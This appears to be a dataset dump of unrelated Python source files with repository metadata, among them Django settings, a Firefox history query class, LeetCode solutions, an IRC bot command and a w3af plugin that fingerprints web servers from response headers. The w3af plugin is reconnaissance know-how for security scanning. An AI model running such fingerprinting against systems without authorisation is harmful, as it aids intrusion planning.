# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
|
[
"eero.afheurlin@iki.fi"
] |
eero.afheurlin@iki.fi
|
b00094732bf4e992d6d1f015c038435845b72877
|
f15d9b6513a053258e1b96fe54d14ee84e92b33a
|
/wirefox/db/moz_places.py
|
561d64e34c1c1363ef89b2f1850d4faf8d44a68b
|
[] |
no_license
|
amol9/wirefox
|
867cbd00c9e250bd91509dfbc1baf751871d8f42
|
3f8561d0c6d01773d510bae337b9348132e3a5c8
|
refs/heads/master
| 2021-01-13T21:14:12.091991
| 2017-03-13T14:29:14
| 2017-03-13T14:29:14
| 81,830,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,096
|
py
|
from .time_window import TimeWindow
from .firefox_db import FirefoxDB
class MozPlaces:
def __init__(self):
self._firefox_db = None
def query(self, url=None, title=None, start_time=None, end_time=None, period=None):
if self._firefox_db is None:
self._firefox_db = FirefoxDB()
self._firefox_db.open_places_db()
session = self._firefox_db.session
moz_places = self._firefox_db.get_moz_places()
q = session.query(moz_places)
if url is not None:
q = q.filter(moz_places.url.like('%s'%url))
if title is not None:
q = q.filter(moz_places.title.like('%%%s%%'%title))
if start_time is not None or end_time is not None or period is not None:
tw = TimeWindow(start=start_time, end=end_time, period=period)
q = q.filter(moz_places.last_visit_date >= (tw.start_time.timestamp() * 1000000))
q = q.filter(moz_places.last_visit_date <= (tw.end_time.timestamp() * 1000000))
for r in q:
print(r.url, '|', r.visit_count)
|
[
"babaiscool@gmail.com"
] |
babaiscool@gmail.com
|
758eb49de79ccd0c369067efc4283f514df09080
|
f77b0f2cc709b9670e6b4dc7145a6ea5368585d2
|
/templates/compiled/macros/grids.py
|
6c7879946fd4f337eb9525497945a87c107b0aa0
|
[] |
no_license
|
sgammon/StonerHub
|
45ccac6bd349200bbc75c494002c3ffeb082dcb8
|
a81f7fdd2c7118c6cea3c25ef9f53f272d27b0cc
|
refs/heads/master
| 2021-01-20T10:54:47.546251
| 2011-11-07T12:02:20
| 2011-11-07T12:02:20
| 2,664,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
from __future__ import division
from jinja2.runtime import LoopContext, TemplateReference, Macro, Markup, TemplateRuntimeError, missing, concat, escape, markup_join, unicode_join, to_string, identity, TemplateNotFound
def run(environment):
name = 'source/macros/grids.html'
def root(context, environment=environment):
if 0: yield None
blocks = {}
debug_info = ''
return locals()
|
[
"sgammon@bluestatedigital.com"
] |
sgammon@bluestatedigital.com
|
e5735a8778ca5d33468e7d9caf2b4a808fae37fb
|
bbe0cb13a7d9ba461b2af6a69f18f8e7ef2301fe
|
/code_processing/Lc2D.1.0e-02_LcSlab.1.0e-02/calc_k_vs_t.py
|
772e49ece97cb6b3a37614a19f8f80df774f52ae
|
[] |
no_license
|
jimsrc/corpad
|
b52b841f0a1b8ddca98236d4a61a9d6079699aff
|
60756729b3cc1206352b95b2038f87b75ac749ef
|
refs/heads/master
| 2021-03-27T10:10:39.756497
| 2018-02-04T18:04:58
| 2018-02-04T18:04:58
| 99,851,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,055
|
py
|
##
from funcs import *
import os
def generate_k_vs_t(Ek, dir_data):
dir_info = '%s/info' % dir_data
fname_orient = '%s/orientations.in' % dir_info
fname_plas = '%s/plas.in' % dir_info
fname_turb = '%s/turb.in' % dir_info
NPLAS = count_lines_in_file(fname_orient)
# orden del nro max de giroperiodos
order_tmax = int(log10(value(fname_plas, 'nmax_gyroperiods')))
# nro de filas x archivo (nro de puntos q le pedi a la simulacion)
nfil = int(order_tmax*value(fname_plas, 'npoints') + 1)
ncol = 6 # nro de columnas x archivo: (t, x, y, z, mu, err-gamma)
NBs = int(value(fname_plas, 'nro_Bfield_realizations'))
rigidity = value(fname_plas, 'rigidity')
#--------------
Nm = int(value(fname_turb, 'n_modos'))
Bo = value(fname_turb, 'Bunif')
Sig = value(fname_turb, 'sigma_Bo_ratio')
perc_2d = value(fname_turb, 'percent_2d')
perc_slab = value(fname_turb, 'percent_slab')
Lc_2d = value(fname_turb, 'Lc_2d')
Lc_slab = value(fname_turb, 'Lc_slab')
lambda_min = value(fname_turb, 'lambda_min')
lambda_max = value(fname_turb, 'lambda_max')
print " ------> Ek [eV]: %g" % Ek
calc_k_versus_t(dir_data, Ek, Sig, NPLAS, NBs, nfil, ncol, Bo,
Lc_2d, Lc_slab, Nm, perc_slab)
def calc_k_versus_t(dir_data, Ek, Sig, NPLAS, NBs, nfil, ncol, Bo,
Lc_2d, Lc_slab, Nm, perc_slab):
dir_plots = '../../plots'
#dir_data= '../../output/Ek.%1.1eeV/sig%d' % (Ek, Sig)
"""dir_out = '../../post/Ek.%1.1eeV/Nm%03d/slab%1.2f/sig.%1.1e/Lc2D.%1.1e_LcSlab.%1.1e' % (Ek, Nm, perc_slab, Sig, Lc_2d, Lc_slab)
try: os.system('mkdir %s' % dir_out)
except: print ""
"""
dir_out = '../../post'
fname_out = '%s/k_vs_t_Ek.%1.1eeV_Nm%03d_slab%1.2f_sig.%1.1e_Lc2d.%1.1e_LcSlab.%1.1e.dat' % (dir_out, Ek, Nm, perc_slab, Sig, Lc_2d, Lc_slab)
#---------------------
# nok : nro de files q existe Y tienen data
# nbad : nro de files q solicite y no existen
# time : grilla temporal
DATA, time, nok, nbad = load_trajectories(NBs, NPLAS, nfil, ncol, dir_data)
print " nro de plas: ", NPLAS
print " nro de B-realizations: ", NBs
print " nro de ptos por trayectoria: %d\n" % nfil
print " nro de archivos q existe c/data: %d/%d " % (nok, nok+nbad)
print " nro de archivos q pedi y NO existen: %d/%d " % (nbad, nok+nbad)
#---------------------
every = 1 # no en c/tiempo, sino cada 'every'
tt, x2, y2, z2 = sqr_deviations(DATA, time, every)
AUinkm = 1.5e8
AUincm = AUinkm*1e5 # [cm]
r2 = x2 + y2
r2 = r2*AUincm**2 # [cm^2]
x2 = x2*AUincm**2 # [cm^2]
y2 = y2*AUincm**2 # [cm^2]
z2 = z2*AUincm**2 # [cm^2]
wc = calc_omega(Bo, Ek) #4.781066E-01 #4.325188E-01 #Ek=1e8eV #4.735689E-01 # Ek=1e7eV #4.781066E-01 # Ek=1e6eV
print " wc[s-1]: ", wc
tt = tt*wc # [1]
#-------------------
kxx = x2/(2.*tt/wc) # [cm2/s]
kyy = y2/(2.*tt/wc) # [cm2/s]
kzz = z2/(2.*tt/wc) # [cm2/s]
#-- guarda data kxx(t)
data_out = array([tt, kxx, kyy, kzz]).T
data_out = data_out[1:] # el 1er tiempo no lo guardo xq es division por zero 1/2t
print " ---> guardando: %s" % fname_out
print ""
savetxt(fname_out, data_out, fmt='%12.2f')
|
[
"jimmy.ilws@gmail.com"
] |
jimmy.ilws@gmail.com
|
566ce5e5e8474e086d441fd7c8275b972cf78d88
|
45c170fb0673deece06f3055979ece25c3210380
|
/toontown/building/DoorTypes.py
|
80898b9b1397fad9906528cf98341b9f7b720109
|
[] |
no_license
|
MTTPAM/PublicRelease
|
5a479f5f696cfe9f2d9dcd96f378b5ce160ec93f
|
825f562d5021c65d40115d64523bb850feff6a98
|
refs/heads/master
| 2021-07-24T09:48:32.607518
| 2018-11-13T03:17:53
| 2018-11-13T03:17:53
| 119,129,731
| 2
| 6
| null | 2018-11-07T22:10:10
| 2018-01-27T03:43:39
|
Python
|
UTF-8
|
Python
| false
| false
| 207
|
py
|
#Embedded file name: toontown.building.DoorTypes
EXT_STANDARD = 1
INT_STANDARD = 2
EXT_HQ = 3
INT_HQ = 4
EXT_HOUSE = 5
INT_HOUSE = 6
EXT_COGHQ = 7
INT_COGHQ = 8
EXT_KS = 9
INT_KS = 10
EXT_ANIM_STANDARD = 11
|
[
"linktlh@gmail.com"
] |
linktlh@gmail.com
|
de4286376cdead9bc0b4496d09485374ed60e6cc
|
7202b4cf562fcacf2f684c1985b448b5780c4967
|
/itp1/07c.py
|
6be9c7cdedee836bbe698a934c291f7e9f692031
|
[] |
no_license
|
mskt4440/AOJ
|
ce523182dbd75e85c1bba43d7d23217711b8e617
|
f6d9ca36e77a88ed9ddbeb53340a745bf8cac157
|
refs/heads/master
| 2021-07-07T00:34:23.034606
| 2020-09-24T02:25:43
| 2020-09-24T02:25:43
| 188,768,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
#
# 7c
#
def main():
r, c = map(int, input().split())
T = []
S = [0 for _ in range(c+1)]
for i in range(r):
C = list(map(int, input().split()))
C.append(sum(C))
T.append(C)
for i in range(r):
for j in range(c+1):
S[j] += T[i][j]
T.append(S)
for i in range(r+1):
print(*T[i])
if __name__ == '__main__':
main()
|
[
"mskt4440@gmail.com"
] |
mskt4440@gmail.com
|
ed43ef6c060ebc2daed645b5f334029f9b430d09
|
95d20fe737d711cf92d68130eb59b6aef4435ec2
|
/正则表达式/非捕获分组.py
|
651491d6f2bb7a136ac85dd6e1b2fef4dc0d1d70
|
[] |
no_license
|
CCH21/Python
|
d11b93851579d85f972828c760a96c5be1f79531
|
33e218810856971f3f1f97a2b8a4c8dce761362e
|
refs/heads/master
| 2022-04-29T11:48:01.816283
| 2022-03-17T11:53:01
| 2022-03-17T11:53:01
| 226,452,057
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
import re
s = 'imgl.jpg, img2.jpg, img3.bmp'
# 捕获分组
p = r'\w+(\.jpg)'
mlist = re.findall(p, s)
print(mlist)
# 非捕获分组
p = r'\w+(?:\.jpg)'
mlist = re.findall(p, s)
print(mlist)
|
[
"1398635912@qq.com"
] |
1398635912@qq.com
|
82b049d66f3602dbc6cae01e74fd629f0634ef53
|
b4cf3438011c9521561143e677736c611ff19a0c
|
/boxx/ylsys.py
|
7643ca805dfe8ff7b284b931db1a46f85be72c4c
|
[] |
no_license
|
BUCT-Vision/boxx
|
3e5c24af20c06d4943dc04859e6cbfb577fe8a48
|
3d405c9ad744d2ff9f6f5d9efb1e31962474565b
|
refs/heads/master
| 2020-03-18T17:35:18.573106
| 2018-09-18T02:49:10
| 2018-09-18T02:49:10
| 135,037,392
| 2
| 0
| null | 2018-09-18T02:49:11
| 2018-05-27T10:44:44
|
Python
|
UTF-8
|
Python
| false
| false
| 3,683
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
A module provide system info and Python Info for boxx
@author: yanglei
"""
import sys, os
from os import environ
def jupyterNotebookOrQtConsole():
env = 'Unknow'
cmd = 'ps -ef'
try:
with os.popen(cmd) as stream:
if not py2:
stream = stream._stream
s = stream.read()
pid = os.getpid()
ls = list(filter(lambda l:'jupyter' in l and str(pid) in l.split(' '), s.split('\n')))
if len(ls) == 1:
l = ls[0]
import re
pa = re.compile(r'kernel-([-a-z0-9]*)\.json')
rs = pa.findall(l)
if len(rs):
r = rs[0]
if len(r)<12:
env = 'qtipython'
else :
env = 'jn'
return env
except:
return env
print(r, env)
pyv = sys.version_info.major
py3 = (pyv == 3)
py2 = (pyv == 2)
linuxYl = sys.platform.startswith('linux')
winYl = sys.platform.startswith('win')
osxYl = sys.platform.startswith('darwin')
import multiprocessing as __module
cpun = __module.cpu_count()
cloud = cpun > 16
if linuxYl or osxYl:
cuda = not os.system('nvcc --version> /dev/null 2>&1')
elif winYl:
import subprocess
try:
cuda = not subprocess.call('nvcc --version', creationflags=0x00000008)
except FileNotFoundError:
cuda = False
usecuda = 'auto' # auto: auto, False: not use
if linuxYl or osxYl:
homeYl = os.getenv('HOME') + '/'
tmpYl = '/tmp/'
elif winYl:
homeYl = os.path.expanduser("~")
tmpYl = os.getenv('TMP') + '\\'
class __TmpboxxWithCall(str):
'''
the tmp dir for boxx
use tmpboxx() to get tmpdir
if not exist then will auto mkdir of boxxTmp in `/tmp`
'''
def __call__(self):
if not os.path.isdir(self):
os.makedirs(self)
return self
tmpboxx = __TmpboxxWithCall(os.path.join(tmpYl,'boxxTmp/'))
class PythonInfo():
'''
python info
plt : Bool
mean plt avaliable
env :
belong [cmd, cmdipython, qtipython, spyder, jn]
'''
pid = os.getpid()
gui = 'ipykernel' in sys.modules
cmdipython = 'IPython' in sys.modules and not gui
ipython = cmdipython or gui
spyder = 'spyder' in sys.modules
if gui:
env = 'spyder' if spyder else jupyterNotebookOrQtConsole()
else:
env = 'cmdipython' if ipython else 'cmd'
cmd = not ipython
qtipython = env == 'qtipython'
jn = env == 'jn'
interactive = bool(getattr(sys, 'ps1', sys.flags.interactive))
plt = True
if not gui and linuxYl and 'DISPLAY' not in os.environ :
plt = False
reloadplt = False
def __str__(self):
from boxx import strMethodForDiraAttrs
return strMethodForDiraAttrs(self)
__repr__ = __str__
pyi = PythonInfo()
class SystemInfo():
'''
sys info
'''
pyv = pyv
cpun = cpun
cuda = cuda
tmp = tmpYl
linux = linuxYl
win = winYl
osx = osxYl
os = sys.platform
display = True
if linuxYl:
display = 'DISPLAY' in environ and environ['DISPLAY']
gui = pyi.gui or display
if 0:
@property
def ip(self):
'''
TODO:
'''
return '127.0.0.1'
@property
def user(self):
import getpass
return getpass.getuser()
@property
def host(self):
import platform
return platform.node()
def __str__(self):
from boxx import strMethodForDiraAttrs
return strMethodForDiraAttrs(self)
__repr__ = __str__
sysi = SystemInfo()
|
[
"ylxx@live.com"
] |
ylxx@live.com
|
05f71de710935c9f61b9d68da2dd6130d14c0aef
|
76027f6d013e12ca4fda95957e0cedbef1779def
|
/leetcode/84-Hard-Largest-Rectangle-In-Histogram/answer.py
|
73fea12149d06b2de3f14d2834336d5e705517c6
|
[
"Unlicense"
] |
permissive
|
BenDataAnalyst/Practice-Coding-Questions
|
79a56617f27a5b2b8d5d9650057a9b0128b9becf
|
4c21ab38b75389cfb71f12f995e3860e4cd8641a
|
refs/heads/master
| 2020-07-23T13:31:48.965116
| 2019-09-09T16:23:09
| 2019-09-09T16:23:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,555
|
py
|
#!/usr/bin/python3
#------------------------------------------------------------------------------
# Solution O(n) Stack Solution
#------------------------------------------------------------------------------
class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
"""
heights.append(0)
stack = [-1]
result = 0
for i in range(len(heights)):
while heights[i] < heights[stack[-1]]:
h = heights[stack.pop()]
w = i - stack[-1] - 1
result = max(result, h * w)
stack.append(i)
return result
#------------------------------------------------------------------------------
# Solution O(n) Kinda DP Solution
#------------------------------------------------------------------------------
class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
"""
result = 0
# Left and right will be a cache to hold the number of bars to left and right >= curr height
left = [1 for _ in range(len(heights))]
right = [1 for _ in range(len(heights))]
# Calculate left
for i in range(len(heights)):
l = i-1
# Grow as far left as possible
# We make jumps based on the previously computed left values
while l >= 0:
if heights[l] >= heights[i]:
left[i] += left[l]
l -= left[l]
else:
break
# Calculate right
for i in range(len(heights)):
r = i+1
# Grow as far right as possible
# We make jumps based on the previously computed right values
while r < len(heights):
if heights[r] >= heights[i]:
right[i] += right[r]
r += right[r]
else:
break
# Now we can iterate through all of our possible rectangles
# We calculate our areas with our height * width (left+right)
for i in range(len(heights)):
result = max(result, heights[i] * (left[i] + right[i] - 1))
return result
#------------------------------------------------------------------------------
# Brute Force Solution (O(n^2))
#------------------------------------------------------------------------------
class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
"""
result = 0
# Find the max area for each bar i
for i in range(len(heights)):
area = heights[i]
l, r = i-1, i+1
# Grow as far left as possible
while l >= 0:
if heights[l] >= heights[i]:
area += heights[i]
l -= 1
else:
break
# Grow as far right as possible
while r < len(heights):
if heights[r] >= heights[i]:
area += heights[i]
r += 1
else:
break
result = max(result, area)
return result
#------------------------------------------------------------------------------
|
[
"kylelim8998@gmail.com"
] |
kylelim8998@gmail.com
|
1523bd6cee28d5286c62ffee8fe3728695519c71
|
7deda84f7a280f5a0ee69b98c6a6e7a2225dab24
|
/Manage/migrations/0015_draft_request_user.py
|
5f6519727e28bb0c0b16dca2a87445ff181ff05d
|
[] |
no_license
|
Cornex-Inc/Coffee
|
476e30f29412373fb847b2d518331e6c6b9fdbbf
|
fcd86f20152e2b0905f223ff0e40b1881db634cf
|
refs/heads/master
| 2023-01-13T01:56:52.755527
| 2020-06-08T02:59:18
| 2020-06-08T02:59:18
| 240,187,025
| 0
| 0
| null | 2023-01-05T23:58:52
| 2020-02-13T05:47:41
|
Python
|
UTF-8
|
Python
| false
| false
| 401
|
py
|
# Generated by Django 2.1.15 on 2020-05-04 22:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Manage', '0014_auto_20200503_1043'),
]
operations = [
migrations.AddField(
model_name='draft',
name='request_user',
field=models.CharField(default='', max_length=64),
),
]
|
[
"khm4321@naver.com"
] |
khm4321@naver.com
|
02d97dde72d76aa6fba06b86768511a2925fe6f3
|
d9b53673b899a9b842a42060740b734bf0c63a31
|
/leetcode/python/medium/p494_findTargetSumWays.py
|
44d6f3cbbfbba1910bfe6c636afae6b5d7481421
|
[
"Apache-2.0"
] |
permissive
|
kefirzhang/algorithms
|
a8d656774b576295625dd663154d264cd6a6a802
|
549e68731d4c05002e35f0499d4f7744f5c63979
|
refs/heads/master
| 2021-06-13T13:05:40.851704
| 2021-04-02T07:37:59
| 2021-04-02T07:37:59
| 173,903,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 969
|
py
|
class Solution:
def __init__(self):
self.helper = {}
def findTargetSumWays(self, nums, S: int) -> int:
if not nums:
return 0
if self.helper.__contains__(tuple([len(nums), S])):
return self.helper[tuple([len(nums), S])]
if len(nums) == 1:
if S == nums[0] and S == -nums[0]:
self.helper[tuple([len(nums), S])] = 2
return 2
elif S == nums[0] or S == -nums[0]:
self.helper[tuple([len(nums), S])] = 1
return 1
else:
self.helper[tuple([len(nums), S])] = 0
return 0
num = self.findTargetSumWays(nums[:-1], S + nums[-1]) + self.findTargetSumWays(nums[:-1], S - nums[-1])
self.helper[tuple([len(nums), S])] = num
return num
slu = Solution()
print(slu.findTargetSumWays([2, 20, 24, 38, 44, 21, 45, 48, 30, 48, 14, 9, 21, 10, 46, 46, 12, 48, 12, 38], 48))
|
[
"8390671@qq.com"
] |
8390671@qq.com
|
74dc0695aadeb764d830515c0fcfee9c3c7fce09
|
5f4e13201d4c5b7edc8dbbda289380682a187bec
|
/deps/scikit-image/doc/examples/filters/plot_deconvolution.py
|
e934221396c76735c9652da0a75a70f6b0ab65a3
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
intellivoid/CoffeeHousePy
|
92f4fb344de757837c3d3da05cb5513e90408039
|
57c453625239f28da88b88ddd0ae5f1ecdd4de3c
|
refs/heads/master
| 2023-02-23T14:32:01.606630
| 2021-01-28T02:57:10
| 2021-01-28T02:57:10
| 324,419,067
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,678
|
py
|
"""
=====================
Image Deconvolution
=====================
In this example, we deconvolve an image using Richardson-Lucy
deconvolution algorithm ([1]_, [2]_).
The algorithm is based on a PSF (Point Spread Function),
where PSF is described as the impulse response of the
optical system. The blurred image is sharpened through a number of
iterations, which needs to be hand-tuned.
.. [1] William Hadley Richardson, "Bayesian-Based Iterative
Method of Image Restoration",
J. Opt. Soc. Am. A 27, 1593-1607 (1972), :DOI:`10.1364/JOSA.62.000055`
.. [2] https://en.wikipedia.org/wiki/Richardson%E2%80%93Lucy_deconvolution
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import convolve2d as conv2
from skimage import color, data, restoration
astro = color.rgb2gray(data.astronaut())
psf = np.ones((5, 5)) / 25
astro = conv2(astro, psf, 'same')
# Add Noise to Image
astro_noisy = astro.copy()
astro_noisy += (np.random.poisson(lam=25, size=astro.shape) - 10) / 255.
# Restore Image using Richardson-Lucy algorithm
deconvolved_RL = restoration.richardson_lucy(astro_noisy, psf, iterations=30)
fig, ax = plt.subplots(nrows=1, ncols=3, figsize=(8, 5))
plt.gray()
for a in (ax[0], ax[1], ax[2]):
a.axis('off')
ax[0].imshow(astro)
ax[0].set_title('Original Data')
ax[1].imshow(astro_noisy)
ax[1].set_title('Noisy data')
ax[2].imshow(deconvolved_RL, vmin=astro_noisy.min(), vmax=astro_noisy.max())
ax[2].set_title('Restoration using\nRichardson-Lucy')
fig.subplots_adjust(wspace=0.02, hspace=0.2,
top=0.9, bottom=0.05, left=0, right=1)
plt.show()
|
[
"netkas@intellivoid.info"
] |
netkas@intellivoid.info
|
739a057d4d441fd18cf2d851c70c964bdf3dd74e
|
9f1b8a1ada57198e2a06d88ddcdc0eda0c683df7
|
/submission - Homework1/ALEXANDER T KOHLROSER_2240_assignsubmission_file_HW1/HW1/index_nested_list.py
|
ca01168c4a25471ab1064be8afb0e0ea61dca486
|
[] |
no_license
|
sendurr/spring-grading
|
90dfdced6327ddfb5c311ae8f42ae1a582768b63
|
2cc280ee3e0fba02e95b6e9f45ad7e13bc7fad54
|
refs/heads/master
| 2020-04-15T17:42:10.781884
| 2016-08-29T20:38:17
| 2016-08-29T20:38:17
| 50,084,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
q = [['a','b','c'],['d','e','f'],['g','h',]]
print q[0][0]
#calls the top right
print q[1]
#calls the middle row
print q[2][1]
#calls the second column of the third row
print q[-1][-2]
print("This calls [2][0] because it goes one left from the first place which would then call the equivalent of [2]. Then it travels two left of the g, which would call g also.")
#ends the code
|
[
"sendurr@hotmail.com"
] |
sendurr@hotmail.com
|
fc884806482e9cabe64688601017f54570459f99
|
515a97129ce1b2b8eecca4b2087fde8985b82d5b
|
/Code-Scraps/old_modules/SpiceGif/gif/Thumbs_Up.py
|
cd3625bd689d898907897679c0cf84a12536f03c
|
[] |
no_license
|
SpiceBot/scraps
|
3ad6e81ac75e2b6a684fea64eb7e75477b0f4f63
|
90125e1397b57ac87cae5f3e506363aa04ddffdc
|
refs/heads/master
| 2020-05-02T21:51:01.297114
| 2019-03-28T15:38:28
| 2019-03-28T15:38:28
| 178,232,887
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,676
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import unicode_literals, absolute_import, print_function, division
import sopel.module
import urllib2
import json
from BeautifulSoup import BeautifulSoup
from random import randint
import sys
import os
moduledir = os.path.dirname(__file__)
shareddir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(shareddir)
from BotShared import *
gifshareddir = os.path.dirname(os.path.dirname(__file__))
sys.path.append(gifshareddir)
from GifShared import *
@sopel.module.commands('thumbsup')
def mainfunction(bot, trigger):
enablestatus, triggerargsarray, botcom, instigator = spicebot_prerun(bot, trigger, trigger.group(1))
if not enablestatus:
# IF "&&" is in the full input, it is treated as multiple commands, and is split
commands_array = spicemanip(bot, triggerargsarray, "split_&&")
if commands_array == []:
commands_array = [[]]
for command_split_partial in commands_array:
triggerargsarray_part = spicemanip(bot, command_split_partial, 'create')
execute_main(bot, trigger, triggerargsarray_part, botcom, instigator)
def execute_main(bot, trigger, triggerargsarray, botcom, instigator):
gif = getGif(bot, {"query": "thumbs up"})
instigator = trigger.nick
responsemsg = [' a thumbs up.', ' a pat on the back.', ' a sarcastic smile.', ' a high five.']
if not gif["error"]:
osd(bot, trigger.sender, 'say', "%s Result (#%s): %s" % (gif['gifapi'].title(), gif['returnnum'], gif['returnurl']))
else:
osd(bot, trigger.sender, 'action', 'gives ' + instigator + random.choice(responsemsg))
|
[
"sam@deathbybandaid.net"
] |
sam@deathbybandaid.net
|
3b5c2be55f423005b409da55eb4cb003a822b22f
|
84c9a6fb5e18741f14a55d0d737e2a556383770d
|
/venv/Lib/site-packages/w3af/plugins/infrastructure/server_header.py
|
9b95285e772beba1b79e247989486a937a290603
|
[] |
no_license
|
AravindChan96/Vulcan
|
638a1db2f84df08bc50dd76c7f142014d529fbec
|
5548a6f36f04108ac1a6ed8e707930f9821f0bd9
|
refs/heads/master
| 2022-11-05T15:05:54.224578
| 2020-06-19T20:44:14
| 2020-06-19T20:44:14
| 273,396,348
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,343
|
py
|
"""
server_header.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from threading import RLock
import w3af.core.controllers.output_manager as om
import w3af.core.data.kb.knowledge_base as kb
from w3af.core.controllers.plugins.infrastructure_plugin import InfrastructurePlugin
from w3af.core.data.url.helpers import is_no_content_response
from w3af.core.data.kb.info import Info
class server_header(InfrastructurePlugin):
"""
Identify the server type based on the server header.
:author: Andres Riancho (andres.riancho@gmail.com)
"""
def __init__(self):
InfrastructurePlugin.__init__(self)
# Internal variables
self._server_headers = set()
self._x_powered = set()
self._lock = RLock()
def discover(self, fuzzable_request, debugging_id):
"""
Nothing strange, just do a GET request to the url and save the server headers
to the kb. A smarter way to check the server type is with the hmap plugin.
:param debugging_id: A unique identifier for this call to discover()
:param fuzzable_request: A fuzzable_request instance that contains
(among other things) the URL to test.
"""
response = self._uri_opener.GET(fuzzable_request.get_url(), cache=True)
with self._lock:
self._check_server_header(fuzzable_request, response)
self._check_x_power(fuzzable_request, response)
def _check_server_header(self, fuzzable_request, response):
"""
HTTP GET and analyze response for server header
"""
if is_no_content_response(response):
#
# UrlOpenerProxy(), a helper class used by most plugins, will
# generate 204 HTTP responses for HTTP requests that fail.
# This makes plugins have less error handling code (try/except),
# and looks like this in the scan log:
#
# Generated 204 "No Content" response (id:2131)
#
# The problem is that in some strange cases, like this plugin,
# the 204 response will trigger a false positive. Because of
# that I had to add this if statement to completely ignore
# the HTTP responses with 204 status code
#
return
server, header_name = response.get_headers().iget('server')
if server in self._server_headers:
return
self._server_headers.add(server)
if server:
desc = 'The server header for the remote web server is: "%s".'
desc %= server
i = Info('Server header', desc, response.id, self.get_name())
i['server'] = server
i.add_to_highlight(header_name + ':')
om.out.information(i.get_desc())
# Save the results in the KB so the user can look at it
kb.kb.append(self, 'server', i)
# Also save this for easy internal use
# other plugins can use this information
kb.kb.raw_write(self, 'server_string', server)
else:
# strange !
desc = ('The remote HTTP Server omitted the "server" header in'
' its response.')
i = Info('Omitted server header', desc, response.id,
self.get_name())
om.out.information(i.get_desc())
# Save the results in the KB so that other plugins can use this
# information
kb.kb.append(self, 'omitted_server_header', i)
# Also save this for easy internal use
# other plugins can use this information
kb.kb.raw_write(self, 'server_string', '')
def _check_x_power(self, fuzzable_request, response):
"""
Analyze X-Powered-By header.
"""
for header_name in response.get_headers().keys():
for needle in ['ASPNET', 'POWERED']:
if needle in header_name.upper():
powered_by = response.get_headers()[header_name]
if powered_by in self._x_powered:
return
self._x_powered.add(powered_by)
desc = 'The %s header for the target HTTP server is "%s".'
desc %= (header_name, powered_by)
i = Info('Powered-by header', desc, response.id, self.get_name())
i['powered_by'] = powered_by
i.add_to_highlight(header_name + ':')
om.out.information(i.get_desc())
# Save the results in the KB so that other plugins can
# use this information. Before knowing that some servers
# may return more than one poweredby header I had:
#
# kb.kb.raw_write( self , 'powered_by' , powered_by )
#
# But I have seen an IIS server with PHP that returns
# both the ASP.NET and the PHP headers
kb.kb.append(self, 'powered_by', i)
# Save the list to the KB
kb.kb.raw_write(self, 'powered_by_string', list(powered_by))
def get_long_desc(self):
"""
:return: A DETAILED description of the plugin functions and features.
"""
return """
This plugin GETs the server header and saves the result to the
knowledge base.
Nothing strange, just do a GET request to the url and save the server
headers to the kb. A smarter way to check the server type is with the
hmap plugin.
"""
|
[
"aravindchan.96@gmail.com"
] |
aravindchan.96@gmail.com
|
4b83674f41dfe0e01b5e0deb3e30fb897f25bc5a
|
977f1105b3a475055631689523b1dcef951c7f72
|
/py_numpy_1.py
|
2110065b1ebc86effcb568fa5a0643b2def8ba8a
|
[] |
no_license
|
pbarton666/PES_Python_examples_and_solutions
|
2f973296796d91a5c8c28000002b996ef143ebb2
|
94fc2c8101a6e654a3ab67b39d1878b9d9f6aa74
|
refs/heads/master
| 2021-01-10T22:45:27.446831
| 2017-05-14T17:11:52
| 2017-05-14T17:11:52
| 70,357,916
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,327
|
py
|
#py_numpy_1.py
